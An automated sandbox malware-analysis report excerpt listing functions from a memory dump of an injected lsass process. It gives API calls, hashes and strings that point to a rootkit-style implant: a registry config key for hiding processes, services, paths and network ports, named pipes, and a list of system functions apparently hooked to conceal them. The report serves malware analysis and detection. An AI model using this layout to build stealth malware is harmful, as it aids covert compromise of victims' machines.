Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86185B
Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861896
Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8618A0

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: 326f40d2db6ff263f8e0a940b391fb73a78b65f37836ebd93bce5d4d1fbe3847
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: 2631CC7128074181FF529B27DA513E963A5AB8CBE4F2858219F1E877B7EF34CC51C292

Function 00000140ADFC273C Relevance: 1.7, APIs: 1, Instructions: 187
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000140ADFC285E

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: 06fb5e1ef4416040f010e1a7d6ba73e71e6e03eebacef6a42692c0d9d5c867cd
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: 10610732B2179887DB65CF1690407AE7393FB58B98F688121DF5907BD4DA38D863E700

Non-executed Functions

Function 00000140AE862B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000140AE862BD0
lstrlenW.KERNEL32 ref: 00000140AE862E0A

Part of subcall function 00000140AE86199C: OpenProcess.KERNEL32 ref: 00000140AE8619C2
Part of subcall function 00000140AE86199C: K32GetModuleFileNameExW.KERNEL32 ref: 00000140AE8619E0
Part of subcall function 00000140AE86199C: PathFindFileNameW.SHLWAPI ref: 00000140AE8619EF
Part of subcall function 00000140AE86199C: lstrlenW.KERNEL32 ref: 00000140AE8619FB
Part of subcall function 00000140AE86199C: StrCpyW.SHLWAPI ref: 00000140AE861A0E
Part of subcall function 00000140AE86199C: CloseHandle.KERNEL32 ref: 00000140AE861A1C

GetProcAddress.KERNEL32 ref: 00000140AE862BE5

Part of subcall function 00000140AE86152C: StrCmpIW.SHLWAPI ref: 00000140AE86155D

Part of subcall function 00000140AE863844: StrCmpNIW.SHLWAPI ref: 00000140AE86385C

StrCmpNIW.SHLWAPI ref: 00000140AE862C28
lstrlenW.KERNEL32 ref: 00000140AE862D50

Strings

NtQueryObject, xrefs: 00000140AE862BDB
\Device\Nsi, xrefs: 00000140AE862C1B
ntdll.dll, xrefs: 00000140AE862BC9

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: bf2ef32ac57e5f465ce725a7a74baab9ea04f71ed1d086599ba6561ce8fa9f42
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: 2AB19E72250B5486EB668F2BD4407E9A3A5FB48BA4F645066EF4D53BB5DF34CC40C382

Function 00000140AE867D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000140AE867DAC
RtlCaptureContext.NTDLL ref: 00000140AE867DD9
RtlLookupFunctionEntry.NTDLL ref: 00000140AE867DF3
RtlVirtualUnwind.NTDLL ref: 00000140AE867E34
IsDebuggerPresent.KERNEL32 ref: 00000140AE867E88
SetUnhandledExceptionFilter.KERNEL32 ref: 00000140AE867EA9
UnhandledExceptionFilter.KERNEL32 ref: 00000140AE867EB4

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: 1503c4d1f0e9a2face0525283fdd9087e61cbfeab21d2c89dc1035b309a16709
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: 2131A372245B808AEB618F61E8407ED7361F788754F64442ADF4D47BA8EF38C948C790

Function 00000140AE86D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000140AE86D31D
RtlLookupFunctionEntry.NTDLL ref: 00000140AE86D335
RtlVirtualUnwind.NTDLL ref: 00000140AE86D370
IsDebuggerPresent.KERNEL32 ref: 00000140AE86D3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 00000140AE86D3B3
UnhandledExceptionFilter.KERNEL32 ref: 00000140AE86D3BE

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: f4b3617ef55b8c279f228a1357564ad9138b4f9cc27f1e8a361b5862f6d2fb0c
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: 9C314E32654B8086EB619F26E8403DE73A4F789764F600125EF9D47BB8EF38C945CB81

Function 00000140AE861628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000140AE861633
HeapAlloc.KERNEL32 ref: 00000140AE861642

Part of subcall function 00000140AE861268: GetProcessHeap.KERNEL32 ref: 00000140AE86126E
Part of subcall function 00000140AE861268: HeapAlloc.KERNEL32 ref: 00000140AE86127D
Part of subcall function 00000140AE861268: GetProcessHeap.KERNEL32 ref: 00000140AE861297
Part of subcall function 00000140AE861268: HeapAlloc.KERNEL32 ref: 00000140AE8612A8

RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
RegCloseKey.ADVAPI32 ref: 00000140AE861734
RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
RegCloseKey.ADVAPI32 ref: 00000140AE86176F
RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA
RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
RegCloseKey.ADVAPI32 ref: 00000140AE861820
RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
RegCloseKey.ADVAPI32 ref: 00000140AE86185B
RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
RegCloseKey.ADVAPI32 ref: 00000140AE861896
RegCloseKey.ADVAPI32 ref: 00000140AE8618A0

Part of subcall function 00000140AE8612BC: RegQueryInfoKeyW.ADVAPI32 ref: 00000140AE861319
Part of subcall function 00000140AE8612BC: GetProcessHeap.KERNEL32 ref: 00000140AE861327
Part of subcall function 00000140AE8612BC: HeapAlloc.KERNEL32 ref: 00000140AE861338
Part of subcall function 00000140AE8612BC: RegEnumValueW.ADVAPI32 ref: 00000140AE861397
Part of subcall function 00000140AE8612BC: GetProcessHeap.KERNEL32 ref: 00000140AE8613DF
Part of subcall function 00000140AE8612BC: HeapAlloc.KERNEL32 ref: 00000140AE8613ED
Part of subcall function 00000140AE8612BC: GetProcessHeap.KERNEL32 ref: 00000140AE86140A
Part of subcall function 00000140AE8612BC: HeapFree.KERNEL32 ref: 00000140AE861418
Part of subcall function 00000140AE8612BC: lstrlenW.KERNEL32 ref: 00000140AE861421
Part of subcall function 00000140AE8612BC: GetProcessHeap.KERNEL32 ref: 00000140AE86142F
Part of subcall function 00000140AE8612BC: HeapAlloc.KERNEL32 ref: 00000140AE86143D

Strings

tcp_local, xrefs: 00000140AE8617FE
process_names, xrefs: 00000140AE86174D
tcp_remote, xrefs: 00000140AE861839
startup, xrefs: 00000140AE8616D5
SOFTWARE\dialerconfig, xrefs: 00000140AE861692
paths, xrefs: 00000140AE861788
udp, xrefs: 00000140AE861874
pid, xrefs: 00000140AE861712
service_names, xrefs: 00000140AE8617C3

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: 4cb465b735a6020238bf1ea048d5c89955278629e63a0cab2664c088472f563d
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: 5771E736750B10C6EB129F66E8906D933A5FB89BA8F201121DF4E97B79DF38C844C781

Function 00000140AE8612BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000140AE861319
GetProcessHeap.KERNEL32 ref: 00000140AE861327
HeapAlloc.KERNEL32 ref: 00000140AE861338
RegEnumValueW.ADVAPI32 ref: 00000140AE861397

Part of subcall function 00000140AE86152C: StrCmpIW.SHLWAPI ref: 00000140AE86155D

GetProcessHeap.KERNEL32 ref: 00000140AE8613DF
HeapAlloc.KERNEL32 ref: 00000140AE8613ED
GetProcessHeap.KERNEL32 ref: 00000140AE86140A
HeapFree.KERNEL32 ref: 00000140AE861418
lstrlenW.KERNEL32 ref: 00000140AE861421
GetProcessHeap.KERNEL32 ref: 00000140AE86142F
HeapAlloc.KERNEL32 ref: 00000140AE86143D
StrCpyW.SHLWAPI ref: 00000140AE86145F
GetProcessHeap.KERNEL32 ref: 00000140AE861476
HeapFree.KERNEL32 ref: 00000140AE861484

Strings

d, xrefs: 00000140AE86135A

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: eaf29793312f880262aa33c4d225e9377ef8ac7c3781aeeffa93a87445d713dc
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: B5516C32640B8486EB56CF62E54839AB7A1F78DBA9F244124DF4D07B29DF3CC445C791

Function 00000140AE861D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000140AE861D1F

Part of subcall function 00000140AE861FD4: GetModuleHandleA.KERNEL32 ref: 00000140AE861FEC
Part of subcall function 00000140AE861FD4: GetProcAddress.KERNEL32 ref: 00000140AE861FFD

Part of subcall function 00000140AE865B30: GetCurrentThreadId.KERNEL32 ref: 00000140AE865B6B

Strings

NtResumeThread, xrefs: 00000140AE861D62
advapi32.dll, xrefs: 00000140AE861DF7, 00000140AE861E18
EnumServiceGroupW, xrefs: 00000140AE861DF0
NtQueryDirectoryFile, xrefs: 00000140AE861D7F
EnumServicesStatusExW, xrefs: 00000140AE861E11, 00000140AE861E32
sechost.dll, xrefs: 00000140AE861E39
NtDeviceIoControlFile, xrefs: 00000140AE861E56
ntdll.dll, xrefs: 00000140AE861D2D
NtQuerySystemInformation, xrefs: 00000140AE861D45
NtEnumerateValueKey, xrefs: 00000140AE861DD6
NtQueryDirectoryFileEx, xrefs: 00000140AE861D9C
NtEnumerateKey, xrefs: 00000140AE861DB9

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: 2267be31c3c8b37de2fa04f2787d19f37c5545ab8d6e24567a23a1f44e334d39
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: 3531A574580B4AA0EA07EB6BE8516E47321BB5D3B4FF05413AE0D131B69F788E49C3D2

Function 00000140ADFC6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000140ADFC6938
__scrt_acquire_startup_lock.LIBCMT ref: 00000140ADFC698A
_RTC_Initialize.LIBCMT ref: 00000140ADFC69B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000140ADFC69DE
__scrt_release_startup_lock.LIBCMT ref: 00000140ADFC6A09

Strings

scriptor', xrefs: 00000140ADFC6B39, 00000140ADFC6BB2, 00000140ADFC6BEC
`dynamic initializer for ', xrefs: 00000140ADFC69C7
`eh vector copy constructor iterator', xrefs: 00000140ADFC6A3B
`eh vector vbase copy constructor iterator', xrefs: 00000140ADFC69EE

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 79a856343edf9d6588f3d0cd2b4f253cfe509a1624521d714eea0eda72951458
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: FC81E23162834987F656AB6798403DB72A3EF8D784F3440259B69477B6DB38C867B300

Function 00000140AE86CE28 Relevance: 18.1, APIs: 12, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00000140AE86CE37
FlsGetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE4C
FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE6D
FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE9A
FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEAB
FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEBC
SetLastError.KERNEL32 ref: 00000140AE86CED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF0D
FlsSetValue.KERNEL32(?,?,00000001,00000140AE86ECCC,?,?,?,?,00000140AE86BF9F,?,?,?,?,?,00000140AE867AB0), ref: 00000140AE86CF2C

Part of subcall function 00000140AE86D6CC: HeapAlloc.KERNEL32 ref: 00000140AE86D721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF54

Part of subcall function 00000140AE86D744: HeapFree.KERNEL32 ref: 00000140AE86D75A
Part of subcall function 00000140AE86D744: GetLastError.KERNEL32 ref: 00000140AE86D764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF76

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: b2b40885048b18a77dd749f130d094d7928ae544b3603784d23cb63539606b23
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: 0941183028174441FA6BAB6799553E922926B5C7B0F744B24AF3E4B6F6DE789C01C2C3

Function 00000140AE862244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000140AE862259
GetCurrentProcessId.KERNEL32 ref: 00000140AE862263

Part of subcall function 00000140AE861934: OpenProcess.KERNEL32 ref: 00000140AE861952
Part of subcall function 00000140AE861934: IsWow64Process.KERNEL32 ref: 00000140AE861968
Part of subcall function 00000140AE861934: CloseHandle.KERNEL32 ref: 00000140AE861983

CreateFileW.KERNEL32 ref: 00000140AE8622BC
WriteFile.KERNEL32 ref: 00000140AE8622E4
ReadFile.KERNEL32 ref: 00000140AE862303
CloseHandle.KERNEL32 ref: 00000140AE86230C

Strings

\\.\pipe\dialerchildproc64, xrefs: 00000140AE86228C
\\.\pipe\dialerchildproc32, xrefs: 00000140AE862293

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: d526e0782f541ea269add2dfc30b9375b8e19e2713657146a865421fd34f2e67
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: FB213936654B40C2EB11CB26E54839A77A1F789BA4F600215EF5D03BB8CF3CC949CB41

Function 00000140AE86A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000140AE86A5A1

Part of subcall function 00000140AE86B414: __GetUnwindTryBlock.LIBCMT ref: 00000140AE86B457
Part of subcall function 00000140AE86B414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000140AE86B47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000140AE86A679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000140AE86A8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 00000140AE86A9DA

Strings

csm, xrefs: 00000140AE86A69C
csm, xrefs: 00000140AE86A5BB
csm, xrefs: 00000140AE86A622

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: 7b4ba636362c0b5caa681dd8b7c7e919a21c7b74d1dcc59cd2284cb1c0ce2a62
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: 80E1B5726447408AEB62DF66D4803DD77A0F74DBA8F200156EF9D57BA9CB38C881D782

Function 00000140ADFC9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000140ADFC99A1

Part of subcall function 00000140ADFCA814: __GetUnwindTryBlock.LIBCMT ref: 00000140ADFCA857
Part of subcall function 00000140ADFCA814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000140ADFCA87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000140ADFC9A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000140ADFC9CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 00000140ADFC9DDA

Strings

csm, xrefs: 00000140ADFC99BB
csm, xrefs: 00000140ADFC9A22
csm, xrefs: 00000140ADFC9A9C

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: 610288a21bba7234f961b83c38f566fdeb512e40ac2c0f228fa86b943482e177
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: 21E1AE726247488BEB62DB26D4803DE37B3FB49B89F200115EF8957BA5DB34C1A2D700

Function 00000140AE86F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00000140AE86F510
GetProcAddress.KERNEL32 ref: 00000140AE86F51C

Strings

ext-ms-, xrefs: 00000140AE86F46D
api-ms-, xrefs: 00000140AE86F45A

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: 54f3c5caea9a3c542447f16078fc342d6fc1075fabbd0ba72b9af9b604dcfd33
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: 0A41AE32391B0082EB27CF17A9047D56391BB4DBB0F7945259E0E97BA4EE38CC45D392

Function 00000140AE86104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000140AE8610B1
RegEnumValueW.ADVAPI32 ref: 00000140AE861117
GetProcessHeap.KERNEL32 ref: 00000140AE86115A
HeapAlloc.KERNEL32 ref: 00000140AE861168
GetProcessHeap.KERNEL32 ref: 00000140AE861185
HeapFree.KERNEL32 ref: 00000140AE861193

Strings

d, xrefs: 00000140AE8610D6

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: f351be34048a7ac2b0398fd5e5befab81f97ba1f80314118af7c8759807b7470
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: 54415B32614B84C6E761CF22E44439A77B1F389BA8F248129DF8D07B68DF38C849CB41

Function 00000140AE86D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D087
FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0A6
FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0CE
FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0DF
FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0F0

Strings

1%, xrefs: 00000140AE86D0CE
Y%, xrefs: 00000140AE86D0A6

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: 5fd4451407afae9fb266b5747a94aa354b26cb0abe68d3eef0f402a98e977e8e
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: D1114C3068434441FA6AAB275A513E962516B5C7F0F785B24AE3D076FEDE78DC02C683

Function 00000140AE867510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000140AE867538
__scrt_acquire_startup_lock.LIBCMT ref: 00000140AE86758A
